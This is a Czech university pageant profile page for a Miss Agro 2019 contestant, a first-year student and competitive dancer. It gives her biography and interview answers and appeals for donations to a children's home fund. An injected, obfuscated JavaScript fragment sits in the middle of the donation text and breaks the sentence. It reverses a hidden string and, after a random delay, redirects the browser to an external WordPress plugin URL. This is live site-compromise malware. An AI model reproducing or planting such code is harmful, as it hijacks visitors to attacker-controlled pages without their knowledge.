Veronika Čermáková

Profil

Fakulta: PEF
Obor: Provoz a ekonomika (PAE)
Ročník: 1.
Věk:
19

Veronika už od mala miluje tanec, doprovází ji celým životem. Od prvních krůčků se protancovala až na krásné 8. místo na mistrovství světa. Dnes byste ji mohli potkat v sále, jak předává své zkušenosti mladším nadějným tanečníkům. Ráda pracuje s dětmi, proto ji tato práce baví a naplňuje ji. Na této cestě ji podporuje její rodina a nejbližší přátelé. Je energická, usměvavá a miluje cestování.

“Podporujeme

)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}domovů“ css=“.vc_custom_1492523222849{margin-top: 30px !important;}“]Miss Agro podporuje mladé studenty z dětských domovů prostřednictvím Nadačního fondu Veroniky Kašákové. Podpořte je i Vy! Přispět můžete libovolnou částkou na účet 2113124252/2700. Více informací najdete na webových stránkách www.nfvk.cz. Děkujeme, že pomáháte!

Proč by ses zrovna Ty měla stát Miss Agro 2019?

Nejsem jednou z těch, která by si šla cíleně za vítězstvím, ráda se zúčastním a užiju si to. Rozhodně ani 170 cm neměřím, tak proč bych zrovna já měla být Miss Agro? Asi hlavně kvůli přátelům, kteří mě přijdou podpořit a mohli by radost z vítězství sdílet se mnou.

Máš nějaký životní vzor? Čím Tě inspiruje?

Neříkala bych tomu úplně životní vzor. Mám své vytyčené cíle a sny, na kterých mě inspirují přátelé, trenérka a hlavně rodina.

Na který předmět na ČZU vzpomínáš nejvíce a proč?

Vzhledem k tomu, že studuji teprve první ročník, tak jsem neměla možnost seznámit se se všemi předměty. Ale zatím mě nejvíce ohromilo matematické nadšení a vnitřní svět mého učitele na Matematické metody pro statistiky. Pokud jste měli MMS, víte, o čem mluvím.

Na co se v soutěži Miss Agro těšíš nejvíc?

Na prvním místě, že poznám nové kamarády a překonám sama sebe. Těším se na příjemně prožité chvilky s holkama a s celým týmem.